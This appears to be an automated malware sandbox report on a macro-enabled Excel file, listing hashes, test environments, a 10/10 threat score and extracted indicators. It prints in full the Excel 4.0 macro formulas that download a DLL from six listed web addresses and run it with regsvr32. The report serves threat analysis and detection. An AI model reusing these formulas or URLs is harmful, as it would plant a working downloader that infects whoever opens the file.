General
Target: aavwelnn
Size: 46KB
Sample: 220522-fynqgafeb5
MD5: 9bd3baddbdf78a835956cc1c694489dd
SHA1: 3116ae5b338a252985d5bd2c035245fec1b06d45
SHA256: 7df06f0d1cb53d8ad793f5f1906a65fa0c80bd1d8719f55aa7f26f9b89c1226e
SHA512: 3c8d56af7d933cb4149abd463c7ef009eca2da903992fa8ae8009c943ede57fd9dc95d6d02455b660555fcd7ed223081175623b513d928e9f9301d5c74ce0d4a
Behavioral task: behavioral1
Sample: aavwelnn.xlsm
Resource: win7-20220414-en
Behavioral task: behavioral2
Sample: aavwelnn.xlsm
Resource: win10v2004-20220414-en
Malware Config
Extracted:
http://eles-tech.com/css/KzMysMqFMs/
http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
https://txpcrescue.com/cgi-bin/5tSO8/
http://hadramout21.com/jetpack-temp/Py/
http://haribuilders.com/zoombox-master/4HYGX/
http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/
formulas:
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0)
=IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0))
=IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0))
=IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0))
=IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0))
=IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0))
=IF('PIMKE'!C24<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll")
=RETURN()
Extracted:
http://eles-tech.com/css/KzMysMqFMs/
http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
Targets
Target: aavwelnn
Size: 46KB
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.